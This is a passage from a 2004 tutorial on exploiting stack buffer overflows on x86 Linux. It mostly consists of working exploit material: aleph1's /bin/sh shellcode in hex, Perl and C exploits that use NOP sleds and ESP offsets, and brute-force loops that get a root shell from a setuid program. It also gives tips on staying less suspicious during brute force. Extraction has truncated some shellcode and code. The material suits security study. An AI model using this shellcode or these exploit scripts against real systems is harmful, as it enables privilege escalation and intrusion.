Both methods are possible, but not always and sometimes one method is a better
or even single option. The two methods are very different, I will only cover the
first method in this paper, but the other one is just as easy (I find it even more

Return into stack buffer

When thinking about how to exploit a stack overflow we already know we can
overwrite the return address, so we can direct execution to any memory address
we want. When it comes to executing code we come to the natural conclusion
that we want to execute code that we supply. We can supply our code by putting
it in the buffer itself, and the return address in this case should be set to the start
of the buffer we overflow. The figure becomes:

2. Exploiting buffer overflows 2004/Oct/8

towards bottom of stack (higher char *argument[1]

memory addresses)
ret will be overwritten with the address return address
of buffer[0]
saved frame-pointer
The buffer contains our code to be buffer[99]
executed, starting at buffer[0] buffer[n]

The buffer is on the stack, so if we would exploit this the commandline would look
like this:

$ ./vulnerable <our_user_supplied_code><padding><return-into-stack-address>

This means our user-supplied code should never be longer than a 100 bytes (if the
vulnerable program's buffer was allocated 100 bytes), but don't worry, we will
require only about 20 bytes for our supplied code. Because it will only be about 20
bytes long, there is a space of aproximately 80 characters between the end of our
code and the saved return address, therefor there will be about 80 characters of
useless data we call padding. After the padding we put the address of the
beginning of our buffer, buffer[0].

Writing the code is not exactly easy in this case, because strcpy() will stop
reading when it sees a NUL-byte remember? This means our code cannot contain
any NUL-byte or it won't work. Another problem is that this code we create is not
exactly source code, it needs to be machine code. This means we need to write
assembler code for what we want to execute, and then convert it into machine
code that can be directly injected into the process (using the supplied buffer) and
executed. In this sub-section we will first see how we can execute code that is
already inside a program by overwriting the saved return address with one we
supply. Ofcourse, this is not really what we want in the end, because it is unlikely
that the vulnerable program contains any useful instructions for us to execute.
Nonetheless it's a good start in understanding buffer overflow exploitation.

2. Exploiting buffer overflows 2004/Oct/8

Taking over control

Consider the following C program:

int function_that_is_not_being_executed ()
printf ("Hey! This function should not have been executed!\n");
exit (2);

int main (int count, char *argument[])

char buffer[100];

if (count < 2)
printf ("You need to give text as an argument, exiting\n");
exit (1);

strcpy (buffer, argument[1]);

printf ("I won't execute what is not being executed.\n");

return 0;

Compile and run this with a supplied string (character array):

detach@luna:~$ gcc -o vulnerable vulnerable.c

detach@luna:~$ ./vulnerable "Hello, I will let you execute what is not being
I won't execute what is not being executed.

In this paragraph we will proof this program wrong. To do this, we need to know
two things first:

● What is the address of function_that_is_not_being_executed

● What is the offset of ret from the start of our buffer

Point one is quite easy to do because once compiled, the address stays the same.
I have mentioned that program text (executable code in a program) is mapped
into memory starting at address 0x08048000, somewhere along those lines is our
function_that_is_not_being_executed, we just need to fetch that address. This can
be done in several ways, the easiest is to use GDB, the GNU Debugger. Pay close
attention, GDB will become one of your best friends:

2. Exploiting buffer overflows 2004/Oct/8

$ gdb -q ./vulnerable
(gdb) print function_that_is_not_being_executed
$1 = {<text variable, no debug info>} 0x8048460
(gdb) quit

Okay, so the address is 0x8048460. Another way to do this non-interactively is by

using objdump:

$ objdump -t vulnerable | grep function_that_is_not_being_executed

08048460 g F .text 00000025 function_that_is_not_being_executed

The first column tells us the same address, notice that it also says the function is
in the .text segment. Now that we know the address to use for overwriting ret,
there rests only one thing to do; create a buffer of more than a 100 bytes
containing the address. But not so fast, there are some Intel rules to follow.

First question is, will our addresses be correctly aligned? The answer is yes, GCC
will always allocate stack space in multiples of 4-bytes (32-bits), if this were not to
be true the address would not fit neatly in the 4-bytes occupied by the ret. So
that's something we won't have to worry about.

The second problem is that we cannot just write 0x8048460, because we have to
consider byte-ordering. Namely, different CPU architectures use different byte-
ordering to store numbers in memory. You can have little-endian or big-endian
byte-order for numbers. So, when you store a number in memory (and an address
is ofcourse a number) that is longer than one byte (the number being higher than
255), it will be written to memory in a specific byte-order. A little-endian CPU such
as Intel's will store the high-order (most significant) byte at the higher address,
and the low-order byte at the lower address. For example if you have a number
0x00FF, on Intel the order would be like in the following table:

Toward higher addresses number[1] 00

Toward lower addresses number[0] FF

This means that we cannot simply write 0x8048460, cause when it is copied byte
by byte the order is not stored in little-endian byte-order and we would get:

2. Exploiting buffer overflows 2004/Oct/8

Toward higher addresses address[3] 60

address[2] 84
address[1] 04
Toward lower addresses address[0] 08

Upon loading ret, the CPU would try to execute instructions at address
0x60840408 because the byte at the higher address is assumed to be most
significant. To avoid this we need to store it in little-endian notation, like this:

Toward higher addresses address[3] 08

address[2] 04
address[1] 84
Toward lower addresses address[0] 60

To do this our bytes need to be ordered this way: 0x60 0x84 0x04 0x08. In C
notation it is: "\x60\x84\x04\x08"

Now let's go back to our vulnerable program and execute the

function_that_is_not_being_executed. To do this we have one question remaining:

● What is the offset of ret from the start of our buffer

Well, we know the size of buffer is 100, and before our buffer on the stack is the
saved frame-pointer (4 bytes) and the saved instruction pointer (EIP, also 4
bytes). Because each address is 4 bytes we need to divide 100 by 4 which is 25,
and in order to overwrite saved frame-pointer and ret, the number is 27. Which
means we need to give 27 addresses of function_that_is_not_being_executed (27
times 4 is 108). Watch this:

$ ./vulnerable `perl -e 'print "\x60\x84\x04\x08" x 27'`

I won't execute what is not being executed.
Hey! This function should not have been executed!

We did it! The line will execute the command perl -e 'print "\x60\x84\x04\x08" x
27', which prints our address 27 times, and this output is given as an argument to
vulnerable because we use the backticks (``).

In this sub-section you learned how to redirect execution by overwriting the return
address with a user-supplied address. Now what we need to do is to execute our
own code.

2. Exploiting buffer overflows 2004/Oct/8

Executing user-supplied code

The first thing we need to think of is what we want to execute and whether it is
worth to execute code on behalf of the process. The vulnerable program we
showed before is not really a good target because it has the same privileges as
we have. So a "vulnerability" in a normal target is only annoying, we can crash it
or execute code, but it does not give us attackers an advantage. No, we need to
attack a process that has privileges that we would be interested in. Such a
program could be a setuid root program, which when executed will run as root.

Since we will attack a local application and not a remote process (such as a
daemon) it is an obvious choice to open a new shell with root privileges for us.
The first hackers experimenting with buffer overflows thought the same and
dubbed the user supplied code shellcode. And although there is now code for all
sorts of purposes, the term shellcode stuck. The shellcode is a piece of machine
code that executes a new shell. We will just use the overly abused shellcode of
aleph1 (aka Elias Levy), as published in phrack issue 49-14 (real hackers know
this article number by heart), Smashing the stack for fun and profit. Let's test his
shellcode by writing the following "C" program5:

char main[] =

Compile and give it "setuid root" privileges and execute it:

$ su
# gcc -o sh sh.c
# chmod 4755 sh
# exit
$ ./sh
sh# exit

It works as expected, we get a shell with root privileges. I will not go into the
details of how shellcode is created, for now you should just notice that the
shellcode contains no NUL-bytes. We can just use this shellcode in exploiting our
buffer overflow to open a shell for now.

Let's exploit this vulnerable program once and for all:

5 Thanks to SolarIce of covertsystems.org for his elegant main hack for testing shellcode

2. Exploiting buffer overflows 2004/Oct/8

int main (int count, char *argument[])

char buffer[100];

if (count < 2)
printf ("You need to give text as an argument, exiting\n");
exit (1);

strcpy (buffer, argument[1]);

return 0;

To successfully exploit this we again need to know the address of our code, which
is the beginning of buffer, as we will want a command like this:

$ ./vulnerable <shellcode><padding><ret>

For this we consult GDB, but first we will make the vulnerable program "setuid

$ su
# gcc -o vulnerable vulnerable.c
# chmod 4755 vulnerable
# exit
$ ls -l vulnerable
-rwsr-xr-x 1 root root 5150 vulnerable

Now we'll go through the process of finding the start address of buffer. A brief
explanation is welcome in advance. What we do is we run the vulnerable program
with an arbitrary argument (as long as it doesn't crash), but before running it we
set a break point on the strcpy call to determine the address of buffer. A
breakpoint in a debugger simply stops the program so you can examine the
running program's state at that time, check values of registers, memory area's,
etcetera. I will guide you through the process.

First we disassemble the main function, which will give us assembly

representation of this function. This is done with the GDB disassemble command.

$ gdb -q ./vulnerable
(gdb) disassemble main
Dump of assembler code for function main:
0x080483c4 <main+0>: push %ebp
0x080483c5 <main+1>: mov %esp,%ebp

2. Exploiting buffer overflows 2004/Oct/8

0x080483c7 <main+3>: sub $0x88,%esp

0x080483cd <main+9>: and $0xfffffff0,%esp
0x080483d0 <main+12>: mov $0x0,%eax
0x080483d5 <main+17>: sub %eax,%esp
0x080483d7 <main+19>: cmpl $0x1,0x8(%ebp)
0x080483db <main+23>: jg 0x80483f5 <main+49>
0x080483dd <main+25>: movl $0x8048560,(%esp)
0x080483e4 <main+32>: call 0x80482d0 <printf>
0x080483e9 <main+37>: movl $0x1,(%esp)
0x080483f0 <main+44>: call 0x80482e0 <exit>
0x080483f5 <main+49>: mov 0xc(%ebp),%eax
0x080483f8 <main+52>: add $0x4,%eax
0x080483fb <main+55>: mov (%eax),%eax
0x080483fd <main+57>: mov %eax,0x4(%esp)
0x08048401 <main+61>: lea 0xffffff88(%ebp),%eax
0x08048404 <main+64>: mov %eax,(%esp)
0x08048407 <main+67>: call 0x80482f0 <strcpy>
0x0804840c <main+72>: mov $0x0,%eax
0x08048411 <main+77>: leave
0x08048412 <main+78>: ret
0x08048413 <main+79>: nop
0x08048414 <main+80>: nop
0x08048415 <main+81>: nop
0x08048416 <main+82>: nop
0x08048417 <main+83>: nop
0x08048418 <main+84>: nop
0x08048419 <main+85>: nop
0x0804841a <main+86>: nop
0x0804841b <main+87>: nop
0x0804841c <main+88>: nop
0x0804841d <main+89>: nop
0x0804841e <main+90>: nop
0x0804841f <main+91>: nop
End of assembler dump.

If you look and think carefully, we know that arguments to strcpy are passed in
reverse order. So first the address of source buffer is pushed on the stack, after
that the address of our destination buffer buffer is pushed on the stack. While we
want to discover the address of buffer we need to see this while the program is
running. A good idea would be to set a breakpoint right before the call to strcpy.
This call is at main+67. To be sure we will also set a breakpoint after the strcpy
call, so we can make sure that the source buffer has been copied.

(gdb) break *main+67

Breakpoint 1 at 0x8048407
(gdb) break *main+72
Breakpoint 2 at 0x804840c

Now we can run the program using run <argument>, which we do now. The
program will stop right before our first breakpoint:

2. Exploiting buffer overflows 2004/Oct/8

(gdb) run abracadabra

Starting program: /home/detach/vulnerable abracadabra

Breakpoint 1, 0x08048407 in main ()

The stackpointer now points at the address of our destination buffer, and before
that on the stack is the address of our source buffer. So let's first confirm these
facts by examining what's 4-bytes from the top of the stack (this should be the
address to the source buffer argument[1]) and the address on top of the stack.
Then we can print the strings that are at these addresses:

(gdb) x/x $esp+4

0xbffffc74: 0xbffffe83
(gdb) x/x $esp
0xbffffc70: 0xbffffc80
(gdb) x/s 0xbffffe83
0xbffffe83: "abracadabra"
(gdb) x/s 0xbffffc80
0xbffffc80: "Ø|\001@"

As expected, at $esp+4 is the address to the string "abracadabra" (argument[1]),

but the first argument (buffer) still holds garbage. Let's confirm this is the buffer
pointer by continuing execution, the next stop is right after the strcpy call:

(gdb) continue

Breakpoint 2, 0x0804840c in main ()

(gdb) x/s 0xbffffc80
0xbffffc80: "abracadabra"

Good! Our string has been copied, and we confirm the address of buffer on the
stack, namely 0xbffffc80 (this will very likely be different on other machines). So
we will place aleph1's shellcode at address 0xbffffc80, or better "\x80\xfc\xff\xbf".
Really, it isn't this simple, because our "abracadabra" string was only 11 chars,
but our shellcode is more than 40 bytes. Because of the argument itself is also on
the stack, the stack will change once your argument size varies. But our work was
not useless, we will use GDB again with our buffer and we will manually determine
the address we do need once again, with the shellcode. So bear with me just a
little longer.

What we do now is put the shellcode first, then some padding so that this first
part is a multiple of 32-bit and then add the address. First we have to know the
size of the shellcode:

$ perl -e 'print length

2. Exploiting buffer overflows 2004/Oct/8


The shellcode is 45 bytes long, which means we need 3 bytes of padding to have
48 bytes (so that it can be divided by 4). We already calculated in the former
section that we need 27 times 4 bytes to reach ret, so we just put 15 return
addresses after our shellcode and padding. Let's make the buffer and see how it

detach@spock:~$ perl -e 'print

08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" .
"pad" . "\x80\xfc\xff\xbf" x 15' > buf
detach@spock:~$ hexdump -v -C ./buf
00000000 eb 1f 5e 89 76 08 31 c0 88 46 07 89 46 0c b0 0b |..^.v.1..F..F...|
00000010 89 f3 8d 4e 08 8d 56 0c cd 80 31 db 89 d8 40 cd |...N..V...1...@.|
00000020 80 e8 dc ff ff ff 2f 62 69 6e 2f 73 68 70 61 64 |....../bin/shpad|
00000030 80 fc ff bf 80 fc ff bf 80 fc ff bf 80 fc ff bf |................|
00000040 80 fc ff bf 80 fc ff bf 80 fc ff bf 80 fc ff bf |................|
00000050 80 fc ff bf 80 fc ff bf 80 fc ff bf 80 fc ff bf |................|
00000060 80 fc ff bf 80 fc ff bf 80 fc ff bf |............|

I think it's beautiful, let's get to the action. I said we needed 15 return addresses,
but this is not necessarily true. Sometimes GCC may allocate a little bit more than
a 100 bytes, this just requires some testing, but it doesn't matter if we would put
a 100 return addresses after our shellcode, it would still run well, so I'll bet on 20
return addresses.

We have established what we will do next, the buffer will hold the shellcode, 3
bytes of padding is added and then 20 return addresses of 4-bytes each. So our
buffer is of a fixed size now, we only need to figure out the beginning of buffer
once again, this can be done by giving the executable and argument to gdb. We
will set the return address to 0xffffffff, but it can be any value as long as it doesn't
contain a NUL-byte. We will then launch GDB and figure out the address and
replace 0xffffffff with the correct address:

detach@spock:~$ gdb -q --args ./vulnerable `perl -e 'print

08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" .
"pad" . "\xff\xff\xff\xff" x 20'`
Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) break *main+72
Breakpoint 1 at 0x804840c
(gdb) run
Starting program: /home/detach/vulnerable ë\^ 1À F F

2. Exploiting buffer overflows 2004/Oct/8

Í 1Û Ø@Í èÜÿÿÿ/bin/shpadÿ

Breakpoint 1, 0x0804840c in main ()

(gdb) x/x $esp
0xbffffc00: 0xbffffc10

Good, with this argument length our buffer starts at address 0xbffffc10. Armed
with this knowledge we will quite GDB and start again using our new piece of

(gdb) continue

Program received signal SIGSEGV, Segmentation fault.

0xffffffff in ?? ()
(gdb) quit
The program is running. Exit anyway? (y or n) y
detach@spock:~$ gdb -q --args ./vulnerable `perl -e 'print
08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" .
"pad" . "\x10\xfc\xff\xbf" x 20'`
Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) run
Starting program: /home/detach/vulnerable ë\^ 1À F F
ó V
Í 1Û Ø@Í èÜÿÿÿ/bin/shpadü
sh-2.05b$ exit

Program exited normally.

(gdb) quit

We got a shell! The "sh-2.05b$" prompt tells us that /bin/sh has been executed by
the vulnerable program. Note that although the vulnerable program was given
"setuid root" privileges, we don't get them, GDB cannot examine a program that
runs as root because otherwise we could utilize GDB's power to do anything we
want (write to memory addresses directly, call functions, etcetera). The above
method was only very useful for explanatory purpose. Don't worry, we will now
get ourselves a root shell. We do this by bruteforcing the correct address. Our
little research again was very useful, because we atleast know that the new
address will be close to the one we used before. In fact, we can tell that the
address is now higher than before because the command is smaller (we now don't
type the 'gdb -q --args' string. Once that string disappears, the stack will shrink a

2. Exploiting buffer overflows 2004/Oct/8

bit, so our return address value will be larger. Now that we know this, we can just
find the return address using brute force, starting at address 0xbffffc10, we
continue exploiting the vulnerable program, each time increasing this return
address with 4. We will do this with one perl command:

$ perl -e 'for ($i=0; $i < 100; $i = $i + 4) { $address = pack('L', (0xbffffc10 + $i)); @arg =
6\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/shpad" . $address x 20; if
( system ("./vulnerable \"@arg\"") == 0 ) { exit } }'
sh-2.05b# exit

Ofcourse that command is a bit too cryptic so i will write it out as a perl script:


# Loop, increase offset with 4 every loop

for ( $i=0; $i < 100; $i = $i + 4)
# Convert the long number to a string (character array)
$address = pack('L', (0xbffffc10 + $i));

# The complete argument; shellcode, padding, return addresses

@arg = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88" .
"\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3" .
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31" .
"\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" .
"\xff\xff/bin/shpad" .
$address x 20;

# Execute the exploit, if it succeeds (system() returns 0), exit.

if ( system ("./vulnerable \"@arg\"") == 0 ) {

Alright, hopefully you basically understand the above code. Once you have the
start address right (as we have found using GDB) the above script should always

$ ./exploit.pl
sh# exit

Root again!

Brute force considerations

2. Exploiting buffer overflows 2004/Oct/8

With a little imagination you can make an ultimate brute-force script that would
guess all return addresses (starting from 0xc0000000), buffer lengths and offsets.

Sometimes buffer overflows can be exploited only once. When for example you
remotely exploit a buffer overflow in a service which does not restart when it
crashes (this is typical for standalone daemons that use threads instead of a new
process for each session), you will not be able to try again. So sometimes it is
essential that you get the correct address right away.

But the foremost practical reason to make good guesses of the return addresses
is system load (for local exploitation) and network traffic (for remotely exploited
buffer overflows). If you need to use brute force you can also put a sleep in each
loop of for example 300 milliseconds, which would greatly reduce the load on the
system, and be less suspicious.

The best way to "guess" the correct return address is to have the same setup as
your target. As one aspect of the start of buffer is how the code is compiled, if you
have the same binaries on a local test system in your "lab" as your target, you
solved one problem of finding the return address. For example, your target runs
Red Hat Fedora 2, you should install a test system running Red Hat Fedora 2 too,
using the same package versions of the vulnerable system, than the code is the
same as well. Because of this, there is one less problem in finding the correct
return address.

The other problem is that the environment itself may differ. The environment of a
process is also put on the stack, so the size of the environment has impact on the
start of your buffer. On your system type the env command:

detach@luna:~$ env

Many of these environment variables are very dynamic, username changes and
such thing. Exploit coders use two methods to completely eliminate these
environment difficulties; NOPs and offsets. These will be discussed in the next

2. Exploiting buffer overflows 2004/Oct/8


Writing exploits in C

We have written our exploits in Perl till now. There are cons and pros to it. Perl is
increasingly more frequently available on target system, but still, a C compiler is
available on virtually any Unix system. So it would be ashame if you needed to
exploit a local stack overflow with your Perl exploit and not having a Perl
interpreter. This is one of the reasons that traditionally, most exploits are written
in C. Another reason is that C is a little closer to assembly and the stuff we do
than Perl is, even though with Perl we can still do anything we want in the area of
exploit coding. Perl's pro is that it is almost ideal for exploit coding, exploits often
require quick modification, reuse of code, etcetera. Because you do not need to
recompile Perl code all the time, it works much faster. However, it is not
guaranteed even that a C compiler is always available, a friend of mine once said
about this "if it doesn't have a C compiler, it's not worth hacking into", which is
one true statement. I should also add that Python is also increasingly used for
exploit coding, but for now it will be available on systems much less frequent than

Despite what you think is the best environment for programming exploits, you
should be familiar with the C exploits in order to adapt existing C exploits, or to
rewrite them in Perl or Python.

Right now we will add two new features to our exploit to try and hit the correct
return address in less tries:

● Use of NOPs
● Use of offset from ESP

We could have added these features in Perl, but as an exercise you can translate
the C program to Perl again.


A NOP is an Intel instruction that literally does nothing, it has the opcode 0x90
and is ideal to use as padding before our shellcode. This way we will not have to
worry much about hitting exactly the right return address. Look at this figure:

2. Exploiting buffer overflows 2004/Oct/8

towards bottom of stack (higher char *argument[1]

memory addresses)
ret will be overwritten with the address return address
of buffer[0]
sfp will be overwritten with the address saved frame-pointer
of buffer[0] (but can also be garbage
Padding and end of shellcode buffer[99]
Start of shellcode buffer[52]
NOP instructions buffer[n]

So the scenario changes and the shellcode is put at the end of buffer, just before
the return addresses. Anything before the shellcode is filled with NOP instructions,
you could say they are part of the shellcode. The consequence is that the return
address needs to point somewhere in the NOPs, which allows us more room to
guess the return address. For example, in case our buffer is a 100 bytes, and our
shellcode is 45 bytes, we need 3 bytes of padding so our shellcode is 48 bytes.
We we will keep 8 bytes for 2 addresses which overwrites ret and sfp (sfp can
actually be overwritten with part of the shellcode too though). The other 52 bytes
before shellcode are all NOPS, which means our return address can simply point
to somewhere between buffer[0] and buffer[51]. When we bruteforce this, we can
make steps of 48 (51 should also work) bytes instead of 4, this will speed up our
search for the correct address by 12! As an exercise you should modify the Perl
exploit to use NOPs. The buffer then should look like this:

00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000010 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000020 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000030 90 90 90 90 eb 1f 5e 89 76 08 31 c0 88 46 07 89 |......^.v.1..F..|
00000040 46 0c b0 0b 89 f3 8d 4e 08 8d 56 0c cd 80 31 db |F......N..V...1.|
00000050 89 d8 40 cd 80 e8 dc ff ff ff 2f 62 69 6e 2f 73 |..@......./bin/s|
00000060 68 70 61 64 10 fc ff bf 10 fc ff bf |hpad........|

If the exact size of the buffer is unknown you could also add more return
addresses so that one of them will overwrite ret and have nops before the
shellcode. Now we resolved one problem, the address do not have to be perfectly

2. Exploiting buffer overflows 2004/Oct/8

calculated anymore, they can usually be guessed in one or several times.

However we still have the problem of varying environments which affect the size
of the stack. This will be dealt with in the next paragraph.

Offset from ESP

The environment (where for example your PATH and USER variable are stored) of
a program is located towards the bottom of the stack, so the figure would be like

towards bottom of stack (higher environment

memory addresses)
program name, arguments,
environment pointer
return address
saved frame-pointer
towards top of stack (lower memory char buffer[100]

As you can see, once the environment size increases, the stack increases and the
addresses towards to top of the stack decrease (toward lower memory

To deal with variable environment sizes there is a solution which is to have the
exploit determine its own stack pointer and then use an offset from that pointer to
determine the start of buffer in the vulnerable program. This works because the
increase and decrease of the stack addresses are equal in programs that run in
the same environment. So for example, when the environment is enlarged by 8
bytes, then the stack addresses change by 8 in both the vulnerable program and
the exploit.

Think about it, the exploit you run sits in an environment and it's stack pointer will
change based on that environment, but the difference (offset) between the
stackpointer in the exploit and the start of buffer in the vulnerable program
remains constant. To determine the stack pointer aleph1 introduced this simple
method in phrack 49-14:

unsigned long get_sp(void) {

__asm__("movl %esp,%eax");
void main() {

2. Exploiting buffer overflows 2004/Oct/8

printf("0x%x\n", get_sp());

It's not as magical as it looks, just a bit of inline assembly. Ofcourse you should
understand by now how it works. Return values of functions are returned by using
the EAX register. So you create a new function called get_sp and put a little inline
assembly in it (in-line assembly is a feature of the C compiler) that returns the
stack pointer by copying it to EAX as a return value. Then you print it with printf.

Let's test this:

detach@spock:~$ ./getsp
detach@spock:~$ ./getsp
detach@spock:~$ export ENVIRONMENT_GARBAGE="We'll see how the stack pointer
detach@spock:~$ ./getsp

So as you can see, running getsp twice doesn't change the value of ESP, but once
you change the environment by adding an environment variable, the stack gets
larger and the stack pointer value decreases, because it grows toward lower

This means that when you run ./vulnerable twice, the return address stays the
same, but when you add or remove environment variables, the return address
needs to be adjusted. This becomes a problem when you write an exploit on your
Red Hat Fedora 2 test system and then try to use it against your target system, it
is quite likely that the environment size is different and the exploit will fail.

To compensate, we can just write an exploit that determines the return address
as an offset from its own stack pointer, this way it will run correctly even when
you run it in a different environment. So this is a clever technique.

Let's write the exploit in C:

unsigned long get_esp(void)

__asm__("movl %esp,%eax");

#define BUFLEN 132

#define NOP 0x90

int main (int argc, char **argv)

2. Exploiting buffer overflows 2004/Oct/8

int i;
char shellcode[] =
unsigned long offset;
unsigned long address;

char arg[BUFLEN];

if (argc < 2) {
printf("You need to provide the offset\n");
offset = atoi(argv[1]);

address = get_esp() - offset;

/* we write 52 nops */
for(i = 0; i < 52; i++)
arg[i] = NOP;

strncpy(arg+i, shellcode, sizeof shellcode);

i = i + sizeof shellcode - 1;
while (i < BUFLEN) {
(unsigned long)* (unsigned long *)&arg[i] = (unsigned long) address;

write(1, arg, BUFLEN);


It's not the best exploit one could write, but it will do. For example you could let
the exploit execute the vulnerable program, and you could prepare the argument
somewhat better, but it will work.

Because the exploit prints out arg we need to catch the argument and give it to
the vulnerable program, like this:

$ ./vulnerable `./exploit <offset>`

In this case, the offset will probably not be very large, because our program will
have about the same stack size. But what we do know is that our buffer is larger
as it needs to be in order to overflow the vulnerable program's buffer. Knowing
this, we can assume we need a positive offset from ESP. But, if you look at our
exploit, it automatically subtracts the offset from ESP, so we need to give a

2. Exploiting buffer overflows 2004/Oct/8

negative offset on the command-line so that the address will become positive
from ESP again. Now let's brute-force the value, I have a feeling we will have a
correct address in no time:

$ i=0; while [ $i -lt 50 ]; do ./vulnerable `./exploit -$i`; let i=$i+48; done

Segmentation fault

Okay, only one segmentation fault, so the correct offset is -48:

$ ./vulnerable `./exploit -48`

sh-2.05b# exit

Great. So our exploit calculates the address like this: %esp - -48 = %esp + 48.

In the exploit I subtracted the offset because most of the time, real-world
vulnerable programs are much larger than our simple exploit, so it's very likely
their stack is much bigger than ours, and buffer may start at a much lower

Once you have this offset, this offset should work on all machines that run the
same operating systems, such as Red Hat Fedora 2 with the exact same
packages. This is why many good exploits include predefined offsets for many
operating system versions. Now that I mention this, Windows platforms are for
this reason an easy target because the different offsets are very limited across
Windows platforms.

Writing good exploits

It is important to write good exploits for yourself, as when hacking, speed matters.
As you want to reuse your exploit code all the time there are few things you
should remember when writing an exploit:

● Write pretty code; don't pretend to be cool because your code looks like shit
and you still understand it (for example, use clear variable names and one
coding style)
● Make it easy to change the shellcode; calculate where to put the shellcode
based on the buffer lengths
● Use the offset method
● Optionally, give the buffer length as an argument to the exploit

But, there are more things. You can for example put the shellcode in an
environment variable instead of in the buffer, this way you can also exploit buffer

2. Exploiting buffer overflows 2004/Oct/8

overflows when there's only a small buffer.

3. Further reading 2004/Oct/8

3. Further reading

Name URI Description

Programming from the http://savannah.nongnu.or Very good introduction to
Ground Up g/projects/pgubook/ IA32/x86 assembly on a
GNU/Linux system
The C Programming ­ The book I learned C from
Language / Brian W.
Kernighan, Dennis M.
A Book on C.: ­ lAnother great C learning
Programming in C. / Al book
Kelley, Ira Poh
Debugging With Gdb: The ­ "Must-have" book on GDB
Gnu Source-Level
Debugger / Richard
Stallman, Roland Pesch,
Stan Shebs

Table 6.3.: Good reads on programming

Name URI Description

Smashing The Stack For http://www.phrack.org/ Best guide to learn on
Fun And Profit phrack/49/P49-14 stack-based buffer
Frame Pointer Overwriting http://www.phrack.org/phr A different way of
ack/55/P55-08 exploiting (more limited)
stack-based buffer
Advanced return-intolib(c) http://www.phrack.org/ Using the return to library
exploits phrack/58/p58-0x04 method to exploit buffer
Bypassing StackGuard http://www.phrack.org/ Another method to exploit
and StackShield phrack/56/p56-0x05 buffer overflows
w00w00 on Heap http://www.w00w00.org/fil Exploit heap-based
Overflows es/articles/heaptut.txt overflows (allocated
through malloc()/brk())

3. Further reading 2004/Oct/8

Name URI Description

Vudo malloc tricks http://www.phrack.org/ Another starting tutorial
phrack/57/p57-0x08 on heap-based overflows
Once upon a free() http://www.phrack.org/phr Another paper on heap
ack/57/p57-0x09 overflows
Smashing The Kernel http://www.phrack.org/phr Exploiting stack overflows
Stack For Fun And Profit ack/60/p60-0x06.txt in kernel-space

Table 6.4.: Further reading on software exploitation


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